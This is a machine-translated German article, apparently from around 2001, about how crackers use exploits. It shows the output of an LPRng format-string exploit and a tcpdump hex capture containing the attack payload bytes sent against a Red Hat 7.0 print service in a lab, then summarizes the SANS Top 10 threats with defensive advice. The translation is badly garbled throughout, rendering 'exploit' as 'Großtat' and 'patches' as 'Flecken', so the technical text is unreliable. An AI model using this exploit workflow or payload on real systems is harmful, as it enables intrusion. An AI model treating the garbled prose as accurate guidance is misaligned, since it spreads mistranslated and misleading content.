.
In diesem Artikel umfassen wir die Großtaten, die durch Cracker laufen gelassen werden. Wir betrachten auch das SANS Liste mit 10 die meiste kritische Internet-Sicherheit Drohungen.
Untersuchung ist beim Berechnen lebenswichtig aus, was geöffnet ist und was geschlossen ist. Der folgende Schritt für einen Cracker ist, zu einem Computernetz wirklich innen zu brechen. Cracker tun dies, indem sie Schwächen in den Betriebssystemdienstleistungen ausnutzen.
Es gibt viele Großtaten heraus dort; die rechte Großtat zu finden kann Kopfschmerzen sein. Nicht alle Großtaten sind verursachtes Gleichgestelltes. Durch dieses bedeute ich, daß die meisten Großtaten Betriebssystemabhängiges sind. Gerade weil es gibt, bedeutet Zeilendruckergroßtat für Linux nicht, daß es auf Solaris und umgekehrt funktionieren würde.
Um zu helfen zu erklären was eine Großtat wie ist und schaut wenn sie durchgeführt wird, habe ich in diesem Artikel den Ausgang von einer Großtat eingeschlossen und einige Pakete bezogen in die Großtat mit ein. Zuerst ein wenig Hintergrund auf der Großtat, die ich entschied laufen zu lassen. In spätem 2000 prüfende Tätigkeit erhöht auf Tor 515 (Zeilendruckertor). Dieses hing mit einer Großtat in roten Zeilendruckerdämon des Hutes 7.0 zusammen. Zu der Zeit dieses Schreibens sehe ich noch viele Prüfspitzen für diesen Service an meiner Brandmauer.
Wenn Sie die Großtat sehen möchten, die ich verwendete, kann es an http://www.netcat.it gefunden werden.
Sind hier die Auflistungen, die zusammen mit etwas Spiel durch Spiel für jedes versprochen werden:
+++ www.netcat.it Remotegroßtat für LPRng/lpd
+++ Großtatinformationen
+++ Opfer: 192.168.1.25
+++ Art: 0 - RedHat 7.0 - Guinesss
+++ Eip Adresse: 0xbffff3ec
+++ Shellcode Adresse: 0xbffff7f2
+++ Position: 300
+++ Ausrichtung: 2
+++ Versatz 0
+++, das 192.168.1.25 mit unserer Formatzeichenkette in Angriff nimmt
+++ Gewaltmann, entspannen sich und genießen die Fahrt; >
Von diesem Ausgang wissen wir, daß die Großtat rotes Zeilendrucker (Art in Angriff nimmt 0-RedHat7.0 - Guinesess) des Hutes 7.0. Möchten sehen, wie tcpdump diesen Angriff ansieht?
18:34:19.991789 > 192.168.1.5.2894 > 192.168.1.25.printer: S 4221747912:4221747912(0) Gewinn
32120 < mss 1460, sackOK, Zeitstempel 4058996 0, nop, wscale 0 > (DF) (ttl 64, Kennzeichnung 11263)
4500 003c 2bff 4000 4006 8b4e c0a8 0105
c0a8 0119 0b4e 0203 fba2 c2c8 0000 0000
a002 7d78 8bb1 0000 0204 05b4 0402 080a
003d ef74 0000 0000 0103 0300
18:34:19.993434 < 192.168.1.25.printer > 192.168.1.5.2894: S 397480959:397480959(0) ack
4221747913 Gewinn 32120 < mss 1460, sackOK, Zeitstempel 393475 4058996, nop, wscale 0 > (DF) (ttl 64,
Kennzeichnung 3278)
4500 003c 0cce 4000 4006 aa7f c0a8 0119
c0a8 0105 0203 0b4e 17b1 13ff fba2 c2c9
a012 7d78 5ee7 0000 0204 05b4 0402 080a
0006 0103 003d ef74 0103 0300
18:34:19.993514 > 192.168.1.5.2894 > 192.168.1.25.printer: . 1:1(0) ack 1 Gewinn 32120 < nop,
nop, Zeitstempel 4058996 393475> (DF) (ttl 64, Kennzeichnung 11264)
4500 0034 2c00 4000 4006 8b55 c0a8 0105
c0a8 0119 0b4e 0203 fba2 c2c9 17b1 1400
8010 7d78 8dac 0000 0101 080a 003d ef74
0006 0103
18:34:19.999662 < 192.168.1.25.printer > 192.168.1.5.2894: P 1:31(30) ack 1 Gewinn 32120
< nop, nop, Zeitstempel 393476 4058996 > (DF) (ttl 64, Kennzeichnung 3279)
4500 0052 0ccf 4000 4006 aa68 c0a8 0119
c0a8 0105 0203 0b4e 17b1 1400 fba2 c2c9
8018 7d78 3e5b 0000 0101 080a 0006 0104
003d ef74 6c70 643a 203a 204d 616c 666f
726d 6564 2066 726f 6d20 6164 6472 6573
730a
18:34:19.999686 > 192.168.1.5.2894 > 192.168.1.25.printer: . 1:1(0) ack 31 Gewinn 32120 < nop,
nop, Zeitstempel 4058997 393476> (DF) (ttl 64, Kennzeichnung 11265)
4500 0034 2c01 4000 4006 8b54 c0a8 0105
c0a8 0119 0b4e 0203 fba2 c2c9 17b1 141e
8010 7d78 8d8c 0000 0101 080a 003d ef75
0006 0104
18:34:20.000863 < 192.168.1.25.printer > 192.168.1.5.2894: F 31:31(0) ack 1 Gewinn 32120
< nop, nop, Zeitstempel 393476 4058997 > (DF) (ttl 64, Kennzeichnung 3280)
4500 0034 0cd0 4000 4006 aa85 c0a8 0119
c0a8 0105 0203 0b4e 17b1 141e fba2 c2c9
8011 7d78 8d8b 0000 0101 080a 0006 0104
003d ef75
18:34:20.000878 > 192.168.1.5.2894 > 192.168.1.25.printer: . 1:1(0) ack 32 Gewinn 32120 < nop,
nop, Zeitstempel 4058997 393476> (DF) (ttl 64, Kennzeichnung 11266)
4500 0034 2c02 4000 4006 8b53 c0a8 0105
c0a8 0119 0b4e 0203 fba2 c2c9 17b1 141f
8010 7d78 8d8b 0000 0101 080a 003d ef75
0006 0104
18:34:20.049095 > 192.168.1.5.2894 > 192.168.1.25.printer: P 1:424(423) ack 32 Gewinn 32120
< nop, nop, Zeitstempel 4059002 393476 > (DF) (ttl 64, Kennzeichnung 11267)
4500 01db 2c03 4000 4006 89ab c0a8 0105
c0a8 0119 0b4e 0203 fba2 c2c9 17b1 141f
8018 7d78 54c5 0000 0101 080a 003d ef7a
0006 0104 4242 f0ff ffbf f1ff ffbf f2ff
ffbf f3ff ffbf 5858 5858 5858 5858 5858
5858 5858 5858 5858 252e 3137 3675 2533
3030 246e 252e 3133 7525 3330 3124 6e25
2e32 3533 7525 3330 3224 6e25 2e31 3932
Lassen Sie uns, was betrachten hier geschieht. Zuerst sehen wir 192.168.1.5 und 192.168.1.25 versuchend, eine Beziehung mit dem TCP herzustellen typischer Dreiwegehändedruck. In der folgenden Ereignisreihenfolge, sehen wir 192.168.1.5, zu versuchen, die Großtat gegen 192.168.1.25 laufen zu lassen. Schließlich sehen wir die 192.168.1.5, 423 Bytes Daten bis 192.168.1.25 zu drücken. Die Großtat setzt dieses für eine Weile fort, bis es fähige Rohling-Kraft die Großtat ist.
Als diese Großtat, die bearbeitet wurden, 192.168.1.25 versehen mir mit einem Oberteil (nicht daß ich es benötigte) und ich tun könnten, was überhaupt ich wünschte.
Großtaten sind die Weise, die Cracker in Systeme brechen. Um sich gegen sie zu schützen, müssen Sie Ihr Betriebssystem mit Flecken aktualisieren. (dieses geht für alle Systeme.)
Die SANS Oberseite 10 kritischsten Internet-Sicherheit Drohungen ist eine Liste der allgemeinsten Großtaten, die in den Computernetzen gefunden werden. Was diese Liste bildet, also Wertsache die Tatsache ist, daß die Gruppe System Leitung Netz-Sicherheit eine Liste der in Verbindung stehenden CVE Eintragungen (allgemeine Verwundbarkeit und Belichtungen) liefert, damit eine Person mehr Forschung wenn notwendig tun kann. Diese Liste wurde von SANS mit Hilfe vieler Sicherheit Experten und der Sicherheit Gemeinschaft kompiliert.
Die CVE Datenbank kann an http://www.cve.mitre.org/ gefunden werden.
Um mehr auf die SANS Oberseite 10 zu lesen, besuchen Sie http://www.sans.org/topten.htm.
Die erste Großtat verzeichnete auf den oberen 10 ist BINDUNG. BINDUNG ist ein Programm, das für DNS Bediener verwendet wird (helfen, Namen zu den Adressen zu beheben) und wird in dem Internet verwendet. In den letzten Paarjahren sind Hauptbohrungen in vielen Versionen der BINDUNG gefunden worden. Es ist für jedermann lebenswichtig, das BINDUNG immer zum Unterhalt oben auf der neuesten Verwundbarkeit laufen läßt. An Jan. 29, 2001, die enthaltenen Netz-Teilnehmer verkündete, daß es mehr Verwundbarkeit in bezug auf BINDUNG Version 4 und BINDUNG Version 8 entdeckte. Flecken sind freigegeben worden und können von der Web site Ihres Betriebssystemverkäufers downloadet werden.
Wenn Sie das Papier lesen möchten, das von NAI gefreigeben wurde, können Sie es hier erhalten: http://www.pgp.com/aboutus/press/pr_template.asp?PR=/PressMedia/01282001-A.asp&Sel=900 oder Sie können das CERT lesen, das an http://www.cert.org/advisories/CA-2001-02.html beratend ist.
Die zweite Großtat in SANS Oberseite 10 ist verletzbare cgi Programme. Diese sind herum für Jahre gewesen und sind der Hauptgrund für die meisten Kerbe Netzaufstellungsorten, die Hauptströmungsaufmerksamkeit empfangen.
Viele dieser CGI-BIN Programme lassen Programmbeispiele nach Installation, die verletzbar sind und erlauben einem böswilligen Benutzer, "Wurzel" Zugang zu erreichen. Wenn ein Angreifer dieses Niveau des Zuganges erhält, kann er tun, während er gefällt (schließen Sie das Ändern der Web site ein). Ich stellte einige Verbindungen zur Verfügung, um mehr Informationen über CGI-BIN Angriffe einzuholen. Diese Liste ist nicht komplett; graben Sie bitte wenig weiter, wenn Sie denken, daß Sie verletzbar sind.
Mehr Informationen können auf CGI-BIN Angriffen von http://www.cert.org/advisories/CA-1997-24.html ,von http://www.cert.org/advisories/CA-1996-11.html oder von http://www.cert.org/advisories/CA-1997-07.html gefunden werden.
Die dritte Großtat ist verletzbare Remoteverfahren Anrufe (RPCs). RPCs lassen C Programme Verfahren bilden ersucht um andere Maschinen über dem Netz. Die meisten Verkäufer stellen Flecken zur Hilfe festziehen hinunter RPC Dienstleistungen zur Verfügung. Dennoch ist die beste Politik betreffend ist diesen Service, wenn Sie ihn nicht benötigen, dann tötet ihn. Sie können ps-ef-ef laufen lassen|grep RPC, finden den Prozeß Identifikation (PID) und lassen dann Tötung 9 PID laufen. Sie können RPC Dienstleistungen beim Anfang auch sperren nach den meisten UNIX Betriebssystemen, indem Sie die Startakte (gelegen an /etc/rc.d/) von einem S (beginnen Sie oben), zu K (Tötung) ändern. Sie können herausfinden, was RPC Programme laufen lassen, indem sie rpcinfo p verwenden.
Mehr Informationen können auf RPC Angriffen von http://www.cert.org/incident_notes/IN-99-04.html gefunden werden.
Die vierte Großtat auf der SANS Oberseite 10 Liste ist verletzbare Remotedaten-Service-Sicherheit Bohrungen in IIS. (ehrlich zu sein, bin ich überrascht, daß Microsoft nicht mehr Verwundbarkeit in den oberen 10. hat) Ich kann das Beschäftigen diese schnelle Großtat aufsummieren wirklich. Bessern Sie Ihr IIS aus.
Mehr Informationen können auf RDS Sicherheit Bohrungen von http://www.wiretrip.net/rfp/p/doc.asp?id=29&iface=2 gefunden werden.
Die fünfte Großtat ist verletzbares sendmail und MIME Angriffe. Diese Verwundbarkeit hängt mit Pufferüberlauf zusammen, sowie Rohrangriffe, die sofortigem Wurzelkompromiß ermöglichen. Es gibt Paare von Weisen, diese Problembereiche zu sichern. Das erste soll die korrekten Flecken für Ihre sendmail/mail Bediener beibehalten. Wenn Sie nicht brauchen, von diesen Dienstleistungen auch nicht zu laufen, können Sie sie sperren (folgen Sie den gleichen Verfahren wie für RPC heraus buchstabiert).
Mehr Informationen können auf sendmail Sicherheit Bohrungen von http://www.cert.org/advisories/CA-97.05.sendmail.html gefunden werden.
Die 6. Großtat ist verletzbares sadmind und mountd. Diese Verwundbarkeit trifft auf Linux Maschinen sowie Solaris Maschinen zu.
Zu mehr Information über sadmind und mountd Sicherheit Bohrungen, Besuch http://www.cert.org/advisories/CA-99-16-sadmind.html oder http://www.cert.org/advisories/CA-1998.12.mountd.html.
Die 7. Großtat in den oberen 10 ist die globale teilende Akte mit NetBIOS Toren 135.139). Dieses ist vermutlich die größten Sicherheit Problembenutzer haben, wenn sie an ein Kabelmodem oder einen DSL angeschlossen werden. Die meisten verstehen nicht das Konzept der Akte teilend und lassen Akte das Teilen ermöglicht. Ein anderes Problem ist Napster. Obgleich Napster nicht hier verzeichnet wird, erfordert es Leute, Verzeichnisse zu teilen und das kann zu das Teilen dann notwendiges führen. Wie beheben wir es? Diese Vorschläge sind vom SANS Aufstellungsort http://www.sans.org/topten.htm:
A. Wenn Sie angebrachte Antriebe teilen, stellen Sie nur erforderliche Verzeichnisse werden geteilt sicher.
B. Für addierte Sicherheit dürfen Sie nur zu den spezifischen IP Adressen teilen, weil DNS Namen sein können spoofed.
C. Für Windows Systeme stellen Sie alle Anteile werden geschützt mit starken Kennwörtern sicher.
D. Für Windows- NTSYSTEME verhindern Sie anonyme Aufzählung der Benutzer, der Gruppen, der Anlagenkonfiguration und der Registerschlüssel über den Anschluß "des ungültigen Lernabschnittes".
Blockieren Sie inbound Anschlüsse zum NetBIOS Kommunikationssteuerungsdienst (TCP 139) am Fräser oder am NT Wirt. Erwägen Sie, den RestrictAnonymous Registerschlüssel für Internet-verbundene Wirte in den alleinstehenden oder nicht-verläßlichen Gebiet Klimas einzuführen.
Die achte Großtat ist schwache Kennwörter. Notwendigkeit I Sagen irgendwie mehr? In jeder möglicher Form der Risikobeurteilung, ist eins der allgemeinsten Verwundbarkeit, die ich sehe, schwache Kennwörter. Wenn Sie oben mit einem Kennwort kommen, erinnern Sie sich, diesen einfachen Richtlinien zu folgen:
- überprüfen Sie, ob das Kennwort acht Buchstaben lang ist.
- überprüfen Sie, ob das Kennwort eine Kombination von Zahlen, von Sonderzeichen und von alphanumerischen Buchstaben ist.
- wählen Sie ein Kennwort aus, das nicht im Wörterbuch ist.
Zu mehr Information über Kennwortstärken, besuchen Sie http://www.cert.org/tech_tips/passwd_file_protection.html.
Die 9. Großtat ist IMAP und KNALL-Puffersammelverwundbarkeit oder falsche Konfiguration. Wieder soll die beste Weise, sich von diesen Angriffen zu sichern den Service sperren, wenn Sie ihn nicht benötigen. Auch wenden Sie die neuesten Flecken an (wenn Sie den Service laufen lassen müssen).
Zu mehr Information über IMAP und KNALL-Sicherheit besuchen Sie bitte http://www.cert.org/advisories/CA-1998.09.imapd.html, http://www.cert.org/advisories/CA-1998.08.qpopper_vul.htmloder http://www.cert.org/advisories/CA-1997.09.imap_pop.html.
Die abschließende Großtat in der SANS Oberseite 10 ist die auf "Öffentlichkeit" eingestellten und "privaten" Rückstellung SNMP Gemeinschaftszeichenketten. Zusammen mit den schwachen Kennwörtern kann diese Verwundbarkeit durch grundlegende Leitung gesteuert werden.
Zu mehr Information über SNMP und Gemeinschaftzeichenketten, sehen Sie http://www.cisco.com/univercd/cc/td/doc/cisintwk/ito_doc/snmp.htm#xtocid210315.
Halten Sie im Verstand, daß diese nicht die einzige Verwundbarkeit auf dem Netz sind. Ein Cracker kann jede mögliche Großtat verwenden, die er in seinem Beutel von Tricks gegen Sie und Ihr Netz hat.
Online: 586 users browsing the articles directory
. |